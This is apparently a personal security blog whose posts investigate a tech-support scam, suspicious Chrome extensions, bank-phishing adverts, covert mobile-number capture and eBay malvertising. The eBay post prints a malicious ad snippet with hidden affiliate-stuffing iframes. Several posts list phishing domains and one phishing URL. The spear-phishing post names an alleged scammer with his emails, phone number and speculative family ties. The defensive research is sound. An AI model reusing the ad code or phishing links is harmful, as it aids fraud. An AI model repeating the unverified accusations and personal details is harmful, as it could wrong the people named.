Lenovo P2 phone, Which microphones are used?

Simple.. Which microphones are used on the Lenovo P2 phone.

On a call: The one on the bottom left of the phone edge, down and to the left of the home button.

When on speakerphone: The one at the top edge of the phone.

Voice Recorder (by Splend Apps): The one on the bottom left of the phone edge, down and to the left of the home button.

Recording a video using inbuilt app or Open Camera: The one on the bottom left of the phone edge, down and to the left of the home button and the one at the top edge of the phone. The top microphone is the left audio channel and the bottom left microphone is the right audio channel. (Possibly reversed depending on orientation of the phone I guess).

Lenovo_P2_Grey

Modified original picture of phone by Rajat491 – CC BY-SA 4.0, https://en.wikipedia.org/w/index.php?curid=53211368

Advertisements
Posted in Uncategorized | Leave a comment

www.help87.com tech support scam (01245785847)

A cold call came into a land line in a plant room while I happened to be in there.

The line being called is not published anywhere and is only there to host broadband. There is no “leak” of info here, just some spammy autodialler.

Initially an Indian lady claimed she was calling from BT and that the connection was sending viruses. Then when she was sure I was “hooked” as a victim she transferred me to an Indian guy.

Sadly as I was in a plant room and on a standard land line phone I couldn’t record the call. I did have access to a virtual machine.

They initially attempted to get me to go to help87.com (which for some reason on the connection I was on would not load).

Then when that failed they got me to use the SupRemo remote software. Again, as I was on-site at a job I spent about 50 minutes trolling them along but had to give up in the end. We didn’t get to the payment stage.

Once the scammer got connected he tried to use the W3C validator (again, a site that wasn’t loading for some reason) and when that failed he used the “tree” command in dos to claim that the system was scanning and cleaning viruses.

The only things I have to go on are the initial domain he tried to use:

help87.com

and the phone caller ID: 01245785847 (aka. +441245785847 or “01245 785 847” / “01245 785847”) in the UK. (Possibly also related “02059837401”)

The phone number doesn’t lead anywhere other than a few other people complaining about scam calls.

Let’s focus on the domain. There are two references to threatexpert reports. Sadly it looks like Symantec have eaten threatexpert and have taken down their free public reports.

The only remaining thing I can go on is the IP, 107.180.9.83, which resolves to a GoDaddy IP “ip-107-180-9-83.ip.secureserver.net”.

I don’t think this is a shared server. It looks like a private dedicated or virtual dedicated. The SSL certificate on it references, “softwaretweak.co” “akick.com” and “akickoptimizer.com”. This domain seems to sell lots of badly written software including “PC Booster” type software.

If you go to buy the software on that site it takes you to a non-secure form that asks for credit card details!

akick not pci compliant.png

They also claim to me Microsoft Gold partners but the link to verify doesn’t work.

Upon digging around some more it seems there may be a reason why they are no longer a Microsoft Gold partner!
1) Their PC Doctor software is listed as malware by Microsoft: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Rogue:MSIL/Rustliver&ThreatID=223709

The Microsoft page above ties it all together too. They reference gattsupport.com (hosted on a different server within the same IP range) which has the same domain registration of technocaretechnology.com!
abhishek.semm@technocaretechnology.com
H-68, Sector-63
City Noida
State Uttar Pradesh
Postal 201307
Country INDIA
Phone 919654796904

The original IP once had a domain gattsupportcom.com pointing at it.

2) They’ve been posting on the Microsoft forums on how to “get [their antivirus] listed in windows security center”: here and here.

Another likely link to them being the same people is another domain on the IP, technocaretechnology.com and gatechnocaretechnology.com, who seem to do outsourced phone support and other business processes.

Other domains on the same server that have no content:

kristechllc.com

In summary: It is my opinion that this company is a scam and, in their downtime, cold call people to attempt to get them to pay for services or products that they don’t need. Certainly they do the standard event viewer “scare” tactics and lie about the reason for the call.

Posted in Uncategorized | 2 Comments

Google Chrome Extensions hiding and waiting?

Update 2018-06-25: Looks like Google have removed at least two of the suspicious extensions from the Chrome Store.. one still remains online.
junkextension contains malware

I’ve seen a strange advert around the internet recently .. sadly I don’t have a screenshot of the advert but it was claiming that I could click on it to get maps and directions.

Upon clicking on it via the advert you see a page relating to map directions:

vomesq

However on the second visit to the advert page if you don’t go via the advert and have cleared your cookies you get a very different page:

hiding extension title on second visit

Already suspicious.. why offer a “mapping” extension which is titled “Slideshow” and then why hide the mapping part of it if someone visits the site without going via the advert?

Clicking any of the elements on the page prompts you to install suspiciously named Google Chrome extensions. Such as:

Tetsop Slideshow with horses
Vomesq Slideshow with four seasons
Ustif slideshow with Rainbow
Klastaf Slideshow with four seasons

tetsop

So, you install the extension.. and nothing useful happens. You don’t get driving directions but you do get horse pictures or other rotating GIF pictures inserted into the Google home page (as shown in the extension screenshot). At the time of screenshotting above the extension had 12,000 uses, as of time of writing this it now has 14,000 users.

The extension content as the ability to modify absolutely any web page the user visits. At the time of writing it appears to not be doing anything malicious.. the sites it regex matches against are Google domains..
Upon visiting a Google home page it then fetches some code from the extension host domain. This, at the moment, is just GIFs. It then injects that GIF code into the page.

What is the point. Someone is spending $$ on clicks on adverts to install a Chrome extension that doesn’t do anything related to the claims in the advert.

It almost seems like they are gathering a user base and will sell? or change? the Chrome Extension in the future to do something malicious or unintended.

Domains relating to this:
data1.vomesq.com
data1.tetsop.com
data1.ustif.com
data1.klastaf.com
natofo.com
travispa.com
onsevino.com
mixoum.com
toutravi.com
amoindi.com
resolve
data1.ustif.com
data1.open-dog.com
data1.gestona.com
data1.iti-maps.fr
data1.mareps.com
data1.teryom.com
data1.estracep.com
data1.imastifi.com
data1.lorelam.com
data1.meu-imc.com
data1.lolaji.com
data1.jounyl.com
data1.selbamo.com
data1.losimt.com
data1.ubersetzung-app.com
data1.anastras.com
data1.barbuna.com
data1.imc-peso.com
data1.ludimaro.com
data1.repossot.com
data1.noesla.com
data1.visoum.com
data1.rosalop.com
data1.exatrom.com
data1.onolli.com
data1.phistouquet.com
data1.felinao.com
data1.iginot.com
data1.makiloy.com
data1.futeala.com
data1.besinaf.com
data1.proufta.com
data1.pintoula.com
data1.nadasto.com
data1.mein-bmi.com
data1.qopletr.com
data1.toumina.com
data1.trumaeo.com
data1.ma-direction.com
data1.fertoul.com
data1.sopreni.com
data1.klastaf.com
data1.bmi-result.com
data1.chrchaimoua.com
data1.swapagg.com
data1.aligoram.com
data1.inadoul.com
data1.sollmia.com
data1.pictdog.com
data1.road-maps.fr
ip20.ip-91-121-54.eu
data1.scopich.com
data1.myloap.com
data1.platoks.com
data1.tetsop.com
data1.sabrelpt.com
data1.routenplaner-karten.com
data1.slimness.fr
data1.stoploco.com
data1.janomirg.com
data1.papsinim.com
data1.sabuf.com
data1.vomesq.com
data1.calcolo-bmi.com
data1.esiliq.com
data1.zargu.com
data1.eurosty.com
data1.noegate.com
data1.bicelou.com
data1.quotient-retraite.fr
data1.greskof.com
data1.bmi-tw.com
data1.maulou.com
data1.gorgiia.com
data1.chutalop.com
data1.quizdoamor.com
data1.oomatie.com
data1.cholty.com
data1.pomrolo.com
data1.point-meteo.fr
data1.recalomoy.com
data1.hyjouco.com
data1.roterf.com
data1.elixet.com
data1.consimis.com
data1.formulapeso.com
data1.saumaf.com
data1.cloakyz.com
data1.my-ideal-weight.com
data1.bmi-berech.com
data1.compasou.com
data1.qibizar.com
data1.poulixo.com
data1.perfect-imc.com
data1.modalas.com
data1.debozoiz.com
data1.mio-percorso.com
data1.plopatic.com
data1.carazouco.com
data1.strasscom.com
data1.frumaa.com
data1.solkyl.com
data1.zoobre.com
data1.rydima.com
data1.monstegou.com
data1.plifacil.com
data1.serlaz.com
data1.stoumo.com
data1.recettes-en-ligne.eu
data1.lettres.net
data1.trouvayca.com
data1.toustestests.com
data1.liloust.com
data1.pasruma.com
data1.lovincalculator.com
data1.stenap.com
data1.ablapol.com
data1.wikimot.fr
data1.olleap.com
data1.macoulpa.com
data1.mes-resultats.com
data1.astrolignes.com
data1.tests-moi.com
data1.dermabeauty.fr
data1.imc-calcular.com
data1.zunelrish.com
data1.kodamil.com
data1.yetras.com
data1.qhirta.com
data1.ruta-mapa.com
data1.eferif.com
data1.javelas.com
data1.ujdilon.com
data1.eneude.com
data1.shakkly.com
data1.bipoel.com
data1.nedolla.com
data1.quizdeamor.com
data1.tramolol.com
data1.kismuta.com
data1.tatoflex.com
data1.iglere.com
data1.roblaprouf.com
data1.grilsta.com
data1.gelupi.com
data1.logmati.com
data1.gopilou.com
data1.ohquizz.com
data1.uclat.com
data1.pronzal.com
data1.dom-app.com
data1.trajets-cartes.com
data1.blamap.com
data1.app-fast.com
data1.annitop.com
data1.nofinaj.com
data1.raepdi.com
data1.calcolo-imc.com
data1.clibar.com
data1.stuana.com
data1.meluli.com
data1.metoun.com
data1.rlicte.com
data1.my-drivingdirections.com
data1.phonalo.com
data1.seconnecter-ici.com
data1.sjilota.com
data1.tyhfepa.com
data1.cloumapco.com
data1.flomaga.com
data1.glicalol.com
data1.noxip.com
data1.gimoli.com
data1.modlat.com
data1.mimaloy.com
data1.manulap.com
data1.cichalou.com
data1.villonat.com
data1.sqadipt.com
data1.iblep.com
data1.slopap.com
data1.stropemer.com
data1.chloki.com
data1.bimwal.com
data1.vlouma.com
data1.satinat.com
data1.apps-italia.com
data1.bezadi.com
data1.samalag.com
data1.lolipt.com
data1.dailyforme.com
data1.start-bmi.com
data1.snarwin.com
data1.ahnat.com
data1.miazuz.com
data1.isobiv.com
data1.atoleg.com
data1.elplic.com
data1.ygivas.com
data1.gripoal.com
data1.klepst.com
data1.manipo.com
data1.luchil.com
data1.soqano.com
data1.baldoun.com
data1.troplip.com
data1.donasip.com
data1.solisoll.com
data1.satouna.com
data1.ortisul.com
data1.avortep.com
data1.stravit.com
data1.grexlip.com
data1.haverto.com
data1.blikux.com
data1.masowe.com
data1.slimya.com
data1.nistada.com
data1.lapretofe.com
data1.depemel.com
data1.sotella.com
data1.ofarnut.com
data1.peso-altezza.com
data1.pocket-rezept.com
data1.routen-karten.com
data1.open-cat.com
data1.meoust.com
data1.allastin.com
data1.naliora.com
data1.slapapi.com
data1.boulass.com
data1.mestaf.com
data1.routenweb.com
data1.recettes.net
data1.les-pages.com
data1.yummmi.es

Strings relating to this:
/plug-post-install.php
my-drivingdirections
partners/plugins/openanigif/openvomesq-data.php
partners/plugins/openanigif/opentetsop-data.php
partners/plugins/openanigif/open-regexps.php
update-version.php

Posted in Uncategorized | Leave a comment

Phishing using Google Adwords / Adsense

Today while searching for a UK Bank Google offered me an advert.

The advert looks very unclear and I expect most “normal” people searching will click on it thinking it is the genuine website.

metrobank phishing mbinternetaccountant org.png
Note: The top “Ad” entry is the phishing link!

So… is Google dumb enough to allow this? It seems so!

You click on it.. spot the difference.

metrobank phishing mbinternetaccountant org fake site
vs
metrobank genuine site

Google are allowing a phishing site to advertise on keywords for a UK bank!

To make identification of this site more difficult it seems that if you visit the site without Google as the referer you get either a 404.. or a website that looks like it is for an accountancy practice.

metrobank phishing mbinternetaccountant org with no google referer

Poor show.. time to report the advert to Google.

However it looks like it isn’t the first time. I can find similar names that have likely had the same scam

hsbcsaving.info – HSBC Bank phishing site
tsbinternet.info – UK Bank; TSB phishing site
tsbinternetsavings.org – UK Bank; TSB phishing site
tsbinternetaccounts.org – UK Bank; TSB phishing site
cbonline.live – Clydesdale Bank phishing site
cbonllne.group – Clydesdale Bank phishing site
cbonlive.group – Clydesdale Bank phishing site
cbonline.online – Clydesdale Bank phishing site
clydesdaleco.xyz – Clydesdale Bank phishing site
cbinternetacc.site – Clydesdale Bank phishing site
cbinternetaccountants.xyz – Clydesdale Bank phishing site
cbonlineaccount.info – Clydesdale Bank phishing site
cbolines.online – Clydesdale Bank phishing site
chasesavingsacc.com – US bank “Chase” phishing site

cbonlinesaver.info – Clydesdale Bank phishing site
cbonlinesaveracc.info – Clydesdale Bank phishing site
cbinternetacc.xyz – Clydesdale Bank phishing site
ntwestm.info – UK Bank NatWest phishing site
personalnatwst.info – UK Bank NatWest phishing site

ylbonline.ltd – Yorkshire Bank phishing site
ybonlline.com – Yorkshire Bank phishing site
ybonlinesavings.xyz – Yorkshire Bank phishing site
ybonllne.systems – Yorkshire Bank phishing site
ylbonline.systems – Yorkshire Bank phishing site
yrkbonline.xyz – Unknown
ysbonline.info – Unknown
ysbonline.info – Unknown
mbinternetaccountant.org – Metro Bank phishing site
mbinternetaccountants.org – Metro Bank phishing site
mbonlinesavings.info – Metro Bank phishing site
mbinternetsaver.com – Metro Bank phishing site
mbinternetaccs.info – Metro Bank phishing site
metrobankinternt.info – Metro Bank phishing site
metrobankinternet.com – Metro Bank phishing site
mbinternetsavings.com – Metro Bank phishing site
mbsavingsacc.info – Metro Bank phishing site
mbonlinehome.info – Metro Bank phishing site
mbinternetsaving.com – Metro Bank phishing site
mbinternt.info – Metro Bank phishing site
mbiinternet.org – Metro Bank phishing site
mbinternetaccount.xyz – Metro Bank phishing site
mtrbonline.info – Metro Bank phishing site
metrbonline.info – Metro Bank phishing site

rbspersonal.xyz – Royal Bank of Scotland phishing site
postoffc.com – UK Bank Post Office phishing site
pstofficeacc.xyz – UK Bank Post Office phishing site
pstoffcsavingsacc.info – UK Bank Post Office phishing site

Most are hosted at “45.76.210.134” (45.76.210.134.vultr.com).

Posted in Uncategorized | Leave a comment

The curious time an advert knows your mobile phone number..

Sorry for the length of this article.. there are so many different parts to this that it is difficult keeping a single sensible train of thought.

I don’t know my mobile number, I don’t use it for calls or texts. It is a SIM I use just for data alone. No Google, Microsoft or any other account has my mobile number.

While browsing a weather website today over 3G on my mobile phone I saw an advert.

Screenshot_20180510-203054

Fine.. so what.. an advert.. This one was for “MobiPlanet” (see screenshot top right); the thing that intrigued me about it was the advert touted FlappyBird – as a Subscription. I was interested how they were doing this along with a “free trial”.

Upon clicking the advert I was taken to a screen similar to this one (see screenshot on left):

Screenshot_20180511-121836

Except the first time I visited it – it didn’t have the mobile number input prompt. This was missing and only the “Subscribe Now” option existed (see photo to the right).
vlcsnap-2018-05-20-13h23m02s141

Stupidly – and thinking that there was no way my browser on my mobile phone was leaking my phone number.. I clicked Subscribe now. To my astonishment I got a text message and was subscribed to the service. No phone number input, no “text back to confirm” feedback loop.

Just instantly subscribed. How! How the heck does a website know my mobile number without me ever inputting it into _anything_.

With a bit of collaboration with a person called “therioman” they confirmed that the same issue affects the 3 other major UK network providers. (O2, Vodafone and EE).
therioman has (very kindly, thank you!) made a video of this happening:

Screenshot_20180511-175909

I’m quite angry at this in the first place. I’ve since spent many hours reproducing the “problem”. Lots of tricks are employed to prevent you seeing the same sign up form again, further visits ask you to type in your number.

I can find what I believe to be the API or service that reported my phone number to the advertiser.

Roll in IMI Mobile (“imimobile.net”)!

My reasoning for thinking it is them is… They are the only likely party with access to cell networks customer data. Business relationships get built.. then API access or customer databases get abused.

Remember.. I don’t know my mobile number and I don’t have it associated with anything. The only thing that knows my mobile number is my password vault and my mobile provider, called “Three”, themselves.

So how can an advertiser get my mobile number from just me browsing around?

The most likely cause is IMI Mobile having a “special deal” with the major UK cell networks.. Three and the other networks have probably setup an intercepting proxy for requests to some IMI Mobile domains and subdomains where the subscriber number is injected into an HTTP header. This IMI Mobile can tell the subscriber accessing their service and can then pass it onto the advertiser.

The specific request which does this, I believe, is unusual requests in the advertiser site pointing to a javascript file at IMI Mobile. However these _all_ return a 0 byte (empty) file. E.g.:

http://pfi.imimobile.net/identify/bbaba4b7-4b22-4c2a-a875-3ba755dde0a7/verify.js
http://pfi.imimobile.net/identify/6e688090-0d93-4c86-bbc0-2cf84730e593/verify.js
http://pfi.imimobile.net/identify/8681162f-f946-43ad-957b-11a4b767162f/verify.js
http://pfi.imimobile.net/identify/9501bcd0-66ce-4f4c-8f2a-49c8889bc8a4/verify.js
http://pfi.imimobile.net/identify/ab1aa5b0-a429-4180-83b9-fbcc58a575e1/verify.js

It is my belief that the /identify/ request, tagged with a GUID, is sent from your mobile browser to IMI Mobile. IMI Mobile receive the request their end along with the mobile phone number or subscriber details injected by the mobile network.

They then, in the background, pass this information back to the advertiser (probably by the advertiser requesting another back end API asking for details about the GUID). The advertiser can then subscribe you or use your mobile phone number in any way they please.

 

Reproduction.

On most UK mobile networks.. and especially Three.. visit weather underground and look at the weather for a location. If you see an advert for a subscription service.. click on it.

I expect the first time you visit that advert you won’t be prompted for your mobile number. You will just see a subscribe button. Any subsequent visits will probably show you a prompt to fill in your mobile number.

See the YouTube video further up the post for one users experience.

Notes
IMI Mobile partners have been naughty in the past with subscription SMS services.
https://psauthority.org.uk/-/media/Files/PhonepayPlus/Adjudications/0001Tribunal_decisions/2016/Tribunal-minutes-72402.ashx
https://psauthority.org.uk/-/media/Files/PhonepayPlus/Adjudications/0001Tribunal_decisions/72152-Tribunal-Minutes-022016.ashx
https://psauthority.org.uk/-/media/Files/PhonepayPlus/Adjudications/0001Tribunal_decisions/71968–Tribunal-Minutes-022016.ashx

Related indicators.

Google Tag Manager: AW-833104379, GTM-59M4Z8S, AW-848165185

Hosts: i.uk.freetrialclub.co.uk, pfi.imimobile.net, freetrialclub.co.uk, streamsharp.com, app.sb7icat.com

I also believe that “nuyoo.club”, “pfi.nuyoo.club”, “joinbodyin8.com” are similars site that employs the same “knows your number” trick. They send requests to the imimobile hosts as well.

Also related but not seen in this incident is “api-in.taptobill.com” which has some association with IMImobile. However the tap2bill name appears on a portal called “PFI Admin” at http://mobilepayments.imimobile.net/ .

Other domains that have previously been seen to call in scripts from the IMIMobile domain and could potentially have also been doing the same “no number to enter or feedback loop” subscription:

pfi.69vidsbox.com
pfi.pornfortress.com
pfi.69camsbox.com
pfi.69vidbox.com
http://www.books4you.zone
http://www.globalcams.world
enter.playboy.vids4u.mobi
http://www.fitmate.tv
http://www.gifstickers.world
http://www.classicmovies.zone
http://www.listen2books.zone
pfi.loadedgames.co.uk
pfi.dailydieters.com
pfi.playpuzzles.fun
i.uk.mymobiplanet.com
i.getmefit.mobi
enter.pb.vids4u.mobi
pfi.footy-tipsters.com
http://www.topwallpapers.club
http://www.mobgames.club
i.uk.freetrialclub.co.uk
pfi.nuyoo.co
pfi.loadedmobi.com
i.free24.co.uk
msplash-uk.fun-mobile.co.uk
msplash2-uk.fun-mobile.co.uk
pfi.gameclub365.com
http://www.hdwallpapers.shop
http://www.zapwin.com
pfi.thewinme.co.uk
pfi.smashvids.com
pfi.crazywin.co.uk
http://www.bigwintoday.com
http://www.hornyvip.com
uk.clubvoucher.co.uk
http://www.xxxvidsuk.com
uk.quiz2win.mobi
i.x-stream2.co.uk
http://www.crazywin.co.uk
tj.reporo.com

Posted in Uncategorized | Leave a comment

eBay: zaful advert playing music automatically (another d.willvox.com malicious advert)

As a follow on from last month where gamiss.com was hijacking eBay pages.. this month it is zaful.com.

This time the visitors don’t get hijacked away from eBay but they do get music playing at them in the background while they are on eBay pages.

The advert causing this looks like:

ebay advert playing music.png

The chain of requests goes as so.

You visit an item on eBay (and probably many of the other pages too).

This has, among many others, an iFrame that fetches from:

https://ir.ebaystatic.com/cr/v/c1/x-frame-4.html

Which then runs some JavaScript to show an advert:  function showAd()

This triggers a request to image3.pubmatic.com which is a legitimate advertising network. This responds with:

https://tags.mathtag.com/notify/js?exch=pub&id=REDACTED&sid=3049544&cid=5455548&nodeid=1135&price=0.08&group=eu&auctionid=2004222052992160077&bp=a_aiaaaa&3pck=REDACTED

Interesting to see the price paid in the URL! Mathtag seems to be where things go wrong (as it did last month too). Mathtag respond with some javascript that sends users onto:

https://d.willvox.com (also used in last months page hijacking).

This malicious website then responds with the advert code:

<div><a href="https://www.zaful.com/" target="_blank"><img src="https://d.willvox.com/ad/zaful.jpg" height="90" width="725"></a>
<img width="300" height="250" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&amp;af=https://ebayadvertising.co.uk/&amp;cn=3049544&amp;cv=5455548&amp;dp=5956238474928068609" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&amp;lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display: none" sandbox="allow-scripts allow-same-origin allow-top-navigation-by-user-activation"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe></div>

Job done! While trying to pollute the eBay visitor with referal code tracking for gamiss, zaful, rosegal, gearbest and aliexpress the zaful page embedded within the advert then has a further embedded youtube video that plays music!

eBay’s only response to this is blaming the user.

ebay blaming user for bad adverts.png

If you are reading this and are affected.. it isn’t you.. it is eBay (again!). Feel free to send them to this page so they can read up on their own crappy advertising ecosystem and fix it.

Posted in Uncategorized | 1 Comment

Spear Phishing against Painter Decorators

This article is a work in progress, some back in a day or so please.

Unusual one this… a painter decorator friend has been plagued by various attempts at phishing his e-mail logins over the past few months. Each time I’ve got to investigating it the “bad page” in the email link has been removed.

Today I got to one early enough to research it while the site was still active.

It starts with a full e-mail conversation that looks like a client interested in the decorators service:

decorating spear phishing

The decorator responds… and then gets a reply with a supposed link to a design or work order.

This link is the phishing page.

https://zakutasinbola.info/3r69mo/bahubali.php?id=00XXX8XX

With what looks potentially like a unique id for the phishing attempt.

If the victim clicks the link they are presented with the phishing page prompting them to select their chosen login method:

decorating spear phishing page.png

decorating gmail phsihing example.png

And, if they fall for it, the deed is done.

However.. the person behind it didn’t do a good job of hiding who they are. The website is hosted in Russia but the domain involved with the one I investigated:

zakutasinbola.info

Registered by Saim Raza. They are, for other scams, using the email addresses “fu.d.too.l786@gmail.com”, “fu.d.tool7.86@gmail.com”, “fudtoo.l786@gmail.com”,  “fudtool786@gmail.com”, “fudtools@gmail.com”, “fud.tools@gmail.com”, “saim.raza1338@gmail.com” and “saim.raza.133.8@gmail.com” mainly using the telephone number “923241237632”.

Supposedly living in Lahore 31050 Pakistan possibly with family Rizwan, Werwer Shahzaf and Noman.. just going by a Google for the telephone number. These associations may be inaccurate.

This information sent me onto a trove of other likely phishing or malicious domains!

1869744.com
1online-activation.com
1online-activation.org
1online-reactivation.com
1online-reactivation.net
1support-technique.com
1support-technique.net
1support-technique.org
2online-activation.net
3lacmebatdone.com
9khlaovk9x.com
abhampashan.info
abhiayegawo.com
abihanirocker.com
abisuries.com
abnamro-alert.com
aboukangaz.com
abtokisikaypas.com
abtosabkadata.com
acc-bmo1-login.com
acced-desjard1-log.com
accesshelp-user.com
access-verificatiion.com
accountvalidation-services.com
accountverifynow.com
acc-secrue1.com
achasbc.com
achesbc.com
achievethem.com
achkomachko.info
achsbclog.com
acibrand.com
acoracide.com
acrotellfi.info
actidomainso.com
actuallz.tk
additiontechna.com
addonsproducts.com
adobefileshareingz.com
adobesauce.com
adobesprotct.com
adverstime.com
advisableserver.com
afabumtunpo.com
affilateservice.com
afinitycreditunion.com
agarishisabko.com
agihaitumer.info
ahlebateloop.com
ahmythsecur.com
ainakhiyand.info
aitumer.info
ajabnatyrisht.com
akhrihabhaeabm.info
alfaisalaih.com
aliancefunding.com
alibabahugia.com
alibabatred.com
alibabbaz.com
alimoladomnok.com
allgoodforno.com
allvegetablessupply.com
allvehiclepartssupply.com
almostweek.com
alorsdance.com
amdgfxclouss.info
americanhsbc.com
ameserve.com
andrjakarbol.com
angrezimain.info
anydasky.com
araboiluae.com
arabooilandgas.com
armoremsid.info
arrriyadh.com
asratgolikaw.com
assleticket.com
atbonline1.com
atharakatha.com
atratevalues.com
audia3i.com
authentisigs.pw
autonawab.com
awargithirehb.com
awaznechay.info
awlatreayhan.com
ayekhudafindorw.com
ayenetflizoa.com
ayhayu.com
azghorerinium.com
bachkrahna.com
bachpansay.com
badlakaralo.com
badnamzmana.com
badshahme.com
bakhshnanhi.com
banapastol.com
bancontact-pay.com
bandroxoma.com
bandroxxxoma.com
banigalaa.com
banking-securities.com
bankingwellssecurelogin.com
bankwithinvestec.com
banoteraswaer.com
barishkapani.info
barlessi.com
basecloudessd.com
basecoinsc.info
beacbuch.com
begumkapyar.com
beparmaishq.com
bercylesfund.com
bhagareyhum.com
bhagnews.com
bhamanihai.com
bhatiyarestor.com
bheeganimco.com
bholarecord.info
bhosabhraha.com
bilidablongra.info
bimardimagka.com
bizwalfes.com
bloshazalima.com
blueblasit.com
bm1o-sigin-logn.com
bmo1-log1n-sec.com
bmo1-mobile-online.com
bmoacaaac.com
bmo-mobile-online-update-now.com
boandamerica.com
boanewban.com
bohaytayae.com
bondpatipai.info
btanaphragr.com
btc-bh.com
bundoarvalves.com
c1bc-acc-login1.com
cablesayget.com
cakewalababa.com
camilacbila.com
canadagovcare.com
canadamobilityrefund.com
canadarevenewfix.com
canadepovd.com
cancel-subscriptionis-apple.com
canperforma.com
caranhweliyan.com
centerwaysi.com
ceo-mail.ml
chabhisovi.com
chaeslik.com
chalochalainmi.com
chalochaleinisb.com
chandmardawa.com
changigalcyar.info
chanjrandalo.com
charsetut.com
chasbardaoz.com
chaskaylartiker.info
chichongshpang.info
chintatachitata.com
chloachahuwa.com
ch-main.com
chotigandwa.com
chuthaidared.com
chutkijotum.com
citibanksibiu.com
cliendvds.com
client-collectonline.com
clnase.com
cloudcoinsc.info
cloudeprotine.com
cloudeto1mail.info
cloudevelly.info
cloud-flowss.com
cloudossione.com
clouds-server.com
codeteachna.com
cofepelayray.com
cofnirmyou.com
coinsservice.com
collect8-collect8.com
com-bz.com
come-live.tk
comensmentop.com
comiservices.com
com-v51.com
conservasprotomar.com
couptechna.com
courierd.com
courierinfos.com
courierworldson.com
credkarioy.com
cunionsuisse.com
customdnss.com
daikhnobay.info
daikhobatsunlo.com
dancealors.com
danifoss.com
dantkadard.com
dashehraeve.com
datacloude.com
datacloudeservicee.com
datanbdways.com
dataplues.com
dateshubs.com
dawatkahi.info
dc-dc7dbd92dde2.botfactorl.com
ddropss.com
deachun.com
debiaserver.com
decusigns.com
dedicatepanel.com
deesqual.com
dekhopaejan.com
delightelevat.com
deltareconz.com
demandertoola.com
demdproducts.com
des1j-accd-sign1.com
desjardins-accesd.com
desjardin-yes.com
dhamkarahe.com
dhishomang.com
dhishunmaka.com
dhokanfoot.com
dholaverayp.com
dhonbadhs.com
dhonblogs.com
dhyandiyakro.com
dilkochuraua.com
dilkortkabad.com
dillnaijanda.com
dilrubahase.com
dimpidadu.com
dinjonzbrand.com
dipb-ae.com
directbfund.com
dirpicture.com
discoveircc.com
discoverrflow.com
disputespaypal.com
dmamastklan.com
dmarc2hmt.info
dmarcserver.com
dobeint.com
docsendfiles.com
docs-filesharingpdf.com
documents-ppdf.com
domai-server.com
domcredits.com
donmains1.com
donotifes.com
dontlesroots.com
doriyanbolaygin.info
dosearrch.com
dosuitrahgye.com
dragproducts.com
dramaloirs.com
dramebazlondi.com
dreamjeerock.com
drlveoneofflce.info
droply.tk
dropmyui.com
dropvalues.com
dubaiover.com
duehelps.com
dueldomains.com
duetotaltech.com
dukhdardhis.com
easyonline-authentification.com
edertopcoma.com
edocument-online.com
egisteruy.com
ehelpsolve.com
eithescrop.com
elhoncho.com
elightelevat.com
email-automotors.com
emt-login-secure.com
emtmobilebrefunddeposit.com
emtmobilebrefunddeposits.com
emtmobiledeposit.com
emtmobilerefunddeposit.com
endonapriv.com
esihra.com
esolutionsx.com
esolvesi.com
essageply.com
etranfermobilerbadas.com
etranfermobileregozer.com
etransfer-interaconline-mobiledeposit879.com
etransfermobilityrefund.com
etransfertml.com
ewholefam.com
excelmanuals.com
exisauto.com
exisinthopes.com
existicpan.com
exitignloop.com
exitinopls.com
exitloops.com
exitngsings.com
exitomains.com
expisolution.com
extinful.com
faceboksigns.com
fash2v.com
feroiz.com
ferozpuraroad.com
feroztechn.com
ferxz.com
fidilitbonimoer.info
fido-canada-ref73639.com
fidodolarsppay.com
fidodollarslivecash.com
fidolivepay.com
filedocfex.com
filmdekhkeaye.com
financialadvisershub.com
findatroperz.com
fivvercredits.com
fleblesnames.com
flowisbest.com
forjustuplaoadd.com
fr-ca-9235.com
ftp.minukiptatera.com
fudsupport.com
gadiraphondi.com
gainmorethan.com
galaxyinvi.com
galibhiparh.com
galsecurs.com
galwaysi.com
gandabacha.com
ganduamira.com
gatajyemeran.com
geoinews.com
gesvaluesni.com
get-cryptostorm.com
getearns.com
gettradlight.com
getupandcboz.com
gharkafasana.com
gholaptrend.com
giftilicard.com
gigafasts.com
gigalinknetworks.com
gigalinkz.com
gistraproduct.com
gistugestio.com
global-entropy.com
global-query.com
gonagos.com
gonglupkay.info
gotabelomerz.com
grabupon.com
grapminrig.info
gualitynet.net
guardedcourierervices.com
gujjartele.com
gumsastele.info
h1p519atv.com
hadiqalokiope.info
hadiqokyav.com
hadseyes.com
hajikobulao.com
hallmania.com
hamzalinks.com
hanmenechaly.com
hargharbcha.com
hasclams.com
haseenpehlu.com
hashzyadahon.com
hasilorlahaslop.info
hasrtenbetab.info
hathbhinhimilaya.info
havetoback.com
hbarcclayss.com
healcra.com
hearinhavaco.com
heartofdiamondz.com
hedsquick.com
heismonefud.com
helodocus.com
helprofte.com
helptohelps.com
hemn-group.com
hibuhazard.com
hilomatyarasy.com
hipnotizedo.com
hipolos.com
hisramnobita.com
hmainconabo.com
hmaranwapho.info
hmzakinonuc.info
hndsecures.com
hojayegasab.com
holahathrakho.com
homeisproducts.com
homesidi.com
honeylofar.com
hope-good.com
hopeishope.com
hoplikes.com
hoslazulman.com
hosspices.com
hostlyk.com
host-menow.com
hostnim.com
housekep.info
hoyslenow.com
hsbc1-login-acc1.com
hsbcbenkz.com
hsbcprivateclientbankingonline.com
hsbcprivatefunds.com
hsbcredit1.com
hsbeecden.com
hsbseedot.com
hudokan.com
humnemana.info
hundabotbura.com
hundandadena.com
huwaytujuda.com
icesmitha.info
icloud-findme.info
icqonlinex.com
idharsaywahan.com
ihaitumer.info
ijachakalz.com
ikperdesidille.com
iktaramend.com
ilaechiwalichue.info
ilahisabka.com
ileshare-access.com
ileshare-securityaccess.com
imdeecol.com
inajokarthay.info
inasertibola.com
inerels.com
info1securessl.com
infobellsa.com
infoiservices.com
infordaynae.com
informations-support.com
informors.com
infosecure1sslo.com
inlowsse.info
inmomnazol.com
inquitity.com
inquritu.com
interac-etransfer-deposit-mobile879.com
interac-etransfer-mobile-deposit.com
interac-mobility.com
interaconline-etransfer-payment.com
interaconline-e-transfer-payment.com
interaconline-etransfer-telusmobility.com
interacs-access.com
